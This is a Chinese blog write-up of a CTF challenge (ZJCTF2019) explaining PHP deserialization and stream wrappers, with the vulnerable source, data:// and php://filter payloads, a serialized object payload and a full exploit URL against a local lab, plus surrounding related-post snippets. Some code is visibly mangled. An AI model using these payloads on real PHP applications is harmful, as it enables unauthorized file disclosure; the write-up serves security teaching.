ctf题php反序列化,从一道CTF题中学习php反序列化与伪协议

最新推荐文章于 2024-04-10 21:58:41 发布
最新推荐文章于 2024-04-10 21:58:41 发布
阅读量1.7k 收藏 2
点赞数
文章标签: ctf题php反序列化

之前一直有想写关于反序列化的东西,可是一直拖拖拖,拖到了现在。

本文尝试从ZJCTF2019中的例题来了解何为php反序列,以及php伪协议。

原题:逆转思维1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20$text = $_GET["text"];

$file = $_GET["file"];

$password = $_GET["password"];

if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){

echo "

".file_get_contents($text,'r')."

";

if(preg_match("/flag/",$file)){

echo "Not now!";

exit();

}else{

include($file);

$password = unserialize($password);

echo $password;

}

}

else{

highlight_file(__FILE__);

}

?>

给text传值

从代码来看,当给text传入“welcome to the zjctf”时可以进入到If语句。直接传值会被file_get_contents过滤掉,所以这里利用php伪协议来给text传值。1payload为text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

a63ef99d03aaf7e9da3561695cdecf5d.png

55cdafc62f853a37ee812c6a18fd8727.png官网资料:

file_get_contents 函数是用于把文件的内容读入到一个字符串中的首选方法

打印date内容 echo file_get_contents(‘data://text/plain;base64,SSBsb3ZlIFBIUAo=’);

读取useless.php文件

从源码中可以看出不能直接读取flag.php文件,根据提示我们先要读取useless.php文件。1payload为file=php://filter/read=convert.base64-encode/resource=useless.php

9afd1dac1f2e421b9fc79cf757224c81.png

解码得到:1

2

3

4

5

6

7

8

9

10

11

12

13class{//flag.php

public $file;

public function __tostring(){

if(isset($this->file)){

echo file_get_contents($this->file);

echo "
";

return ("HAHAHAHAHA");

}

}

}

?>

填写password参数拿到flag

上一步我们已经拿到useless.php文件的源码,从代码来看提示了有一个flag.php文件并且在最早的源码中出现了unserialize($password),所以这里的password肯定是要填序列化之后的值。

序列化:保存对象的状态,方便时可恢复对象状态,使之长久保存

代码:1

2

3

4

5

6

7class{

public $file="flag.php";

}

$a=new Flag();

echo serialize($a);

?>

生成payload1payload为password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

5fbdb784584eed1c9b9fc614a1c3317e.png

综合上述三步,完整的payload为1http://127.0.0.1/1.php?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:%22Flag%22:1:{s:4:%22file%22;s:8:%22flag.php%22;}

783203582355b4f4511e07eecee56f49.png

总结

php反序列化

serialize()将对象的用字符串的方式进行表示,unserialize()将序列化的字符串,构造成相应的对象。

O:4:”Flag”:1:{s:4:”file”;s:8:”flag.php”;}1对象类型:对象名长度:“对象名”:对象成员变量个数:{变量1类型:变量名1长度:变量名1; 参数1类型:参数1长度:参数1; 变量2类型:变量名2长度:“变量名2”; 参数2类型:参数2长度:参数2;… …}

魔术方法会被自动调用,常见的魔术方法有construct(), destruct(), call(), callStatic(), get(), set(), isset(), unset(), sleep(), wakeup(), toString(), invoke(), set(), _state(), clone(), __debugInfo() …

反序列化漏洞中常见到有一些魔术方法:

construct():在对象创建时自动被调用;

destruct():在脚本运行结束时自动被调用;

sleep():在对象序列化的时候自动被调用;

wakeup():在反序列化为对象时自动被调用;

__toString(): 直接输出对象引用时自动被调用;

php伪协议file:// — 访问本地文件系统

http:// — 访问 HTTP(s) 网址

ftp:// — 访问 FTP(s) URLs

php:// — 访问各个输入/输出流(I/O streams)

data:// — 数据(RFC 2397)

glob:// — 查找匹配的文件路径模式

phar:// — PHP 归档

ssh2:// — Secure Shell 2

expect:// — 处理交互式的流

data://中相关内容:1

2

3

4

5

6

7

8

9* data:,文本数据

* data:text/plain,文本数据

* data:text/html,HTML代码

* data:text/css;base64,css代码

* data:text/javascript;base64,javascript代码

* data:image/x-icon;base64,base64编码的icon图片数据

* data:image/gif;base64,base64编码的gif图片数据

* data:image/png;base64,base64编码的png图片数据

* data:image/jpeg;base64,base64编码的jpeg图片数据

php://中的相关内容:1

2

3

4

5*php://filter:用于读取源代码并进行base64编码输出(一般可读取藏在源代码中的flag)

eg:php://filter/read=convert.base64-encode/resource=useless.php

*php://input:可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行。

eg:就如本体中在对text赋值是可写成text=php://input,然后再用post把welcome to the zjctf一起传过去,同样可以绕过file_get_contents()函数

weixin_39927214
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
反序列化类型CTF目总结
Lelouch_E的博客
11-25 1676
反序列化CTF总结buu NiZhuanSiWeiareuserialz buu NiZhuanSiWei 主页是一段php代码,审计:     有file_get_content(),可以利用伪协议写入‘welcome to the zjctf '过判断;     同时看到提示有useless.php ,可以利用include()读一下文件     构造payload: ?text
CTF web小总结
A_dmin的博客
07-15 3537
PHP绕过技巧、SQL技巧、命令执行绕过小技巧、反序列化、文件上传绕过
轻松通过file_get_contents目(Bugku CTF
最新发布
m0_63602484的博客
04-10 246
a.这里需要打开burpsuite进行抓包,将抓取的数据包send to repeater,然后在重发器选项卡中进行编辑。b.只需要在GET/后面添加?ac=flag&fn=php://input,然后在数据包末尾添加flag即可。根据代码提示,这里我们构造php伪协议代码,并借助Burpsuite来修改数据包。c.最后发送请求,在右侧响应里面即可得到正确的flag。
CTF之序列化__toString
yyj1781572的博客
12-04 985
CTF之序列化__toString
D3CTF shellgen2 对无字母数字phpshell学习
weixin_45805993的博客
03-24 221
waf def waf(phpshell): if not phpshell.startswith(b'<?php'): return True phpshell = phpshell[6:] for c in phpshell: if c not in b'0-9$_;+[].=<?>': return True else: print(chr(c), end=''
nssctf
weixin_63231007的博客
04-30 1052
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'
nssctf web入门(4)
qq_61988806的博客
04-16 673
这里通过nssctf单入门来写,会按照单详细解释每单在中。想入门ctfweb的可以看这个系列,之后会一直出这个单的解析,目一共有28,打算写10篇。
php代码-ctf payload 第九 反序列化 do you know robot
07-15
php代码-ctf payload 第九 反序列化 do you know robot
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
一道CTF学习PHP反序列化漏洞-附件资源
03-02
一道CTF学习PHP反序列化漏洞-附件资源
CTF(web)中的常见php函数意义与用法
qq_52907838的博客
04-05 1372
is_numeric()函数用于检测变量是否为数字或数字字符串, 如果指定的变量是数字和数字字符串则返回 TRUE,否则返回 FALSE,注意浮点型返回空值,即 FALSE var_dump()会返回数据变量的类型和值 eval()会把字符串当作php代码 看到eval(),想到可以用命令执行漏洞 strpos() 函数用于在字符串内查找一个字符或一段指定的文本,如果在字符串中找到匹配,该函数会返回第一个匹配的字符位置。如果未找到匹配,则返回 FALSE。 strlen函...
BugkuCTF-WEBfile_get_contents
am_03的博客
08-29 5921
知识点 empty() 函数用于检查一个变量是否为空。empty() 判断一个变量是否被认为是空的。当一个变量并不存在,或者它的值等同于 FALSE,那么它会被认为不存在。如果变量不存在的话,empty()并不会产生警告。 extract()函数从数组里将变量导入到当前的符号表。extract函数:可以进行变量覆盖。 语法:extract(array,extract_rules,prefix) 该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组里的各元素,将在当前符号表里创建对应的一个变量。第二
攻防世界-nizhuansiwei/php伪协议与文件包含函数,反序列化
weixin_38885346的博客
04-09 385
打开靶场后,可以看到代码如下 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1&
ctfphp反序列化,[世安杯]一道关于php反序列化漏洞的
weixin_36440198的博客
04-01 969
Paste_Image.png没什么信息,因此ctrl+u查看源码:Paste_Image.png看到提示,file_get_contents()函数,联想到文件包含漏洞,因此google一波,查到Paste_Image.png查看原文因此试一试:Paste_Image.png补充一种饶过方法:由于本:allow_url_include=On因此可以包含一个远程文件,假设你的云服务IP地址为:x...
文件包含函数
qq_70851535的博客
05-21 1215
将代码传入文件,从而直接执行文件中的代码通常文件包含漏洞产生于文件包含函数LFI:Local File Inclusion,本地文件包含漏洞,大部分情况下遇到的文件包含漏洞都是LFIRFI:Remote File Inclusion,远程文件包含漏洞(默认为On) ,规定是否允许从远程服务器或者网站检索数据(php5.2之后默认为Off) ,规定是否允许远程文件。
bugku-welcome to bugkuctfPHP伪协议&PHP反序列化综合运用)
烟敛寒林的博客
04-26 1247
1.通过php://input对变量输入内容,让file_get_contents能够读取变量的内容 2.通过php://filter/read=convert.base64-encode/resource=xxx.php得到其他PHP文件的源代码 3.通过反序列化,对echo的魔术方法__tostring()里面的参数进行赋值 目地址:http://123.206.87.240...
[BJDCTF2020]ZJCTF,不过如此
05-07 353
<?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_mat.
CTF-PHP反序列化
m0_65336233的博客
10-18 1277
CTF-PHP反序列化
php get请求_ctf中关于php伪协议的考查
weixin_39928003的博客
11-30 490
原创:Archerx 合天智汇1php://input协议第一个例子flag.php<?php$flag = 'flag{flag_is_here}'; test1.php<?phpinclude('flag.php');$a= $_GET["a"];if(isset($a)&&(file_get_contents($a,'r'))=== 'this is tes...
ctf php反序列化
06-07
CTF中的PHP反序列化攻击主要针对使用PHP的Web应用程序,攻击者可以利用PHP反序列化漏洞来执行恶意代码或者获取敏感信息。攻击者通常会通过构造恶意的序列化数据来触发漏洞,从而实现攻击的目的。 在实际攻击中,攻击者通常会在Cookie、GET或POST参数中注入恶意的序列化数据,然后通过触发漏洞来执行恶意代码或获取敏感信息。为了防止这种攻击,应用程序开发人员需要对输入进行严格的过滤和验证,并且尽可能避免使用反序列化功能。此外,还可以使用专门的安全框架来防止这种攻击,比如PHP的Suhosin扩展。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值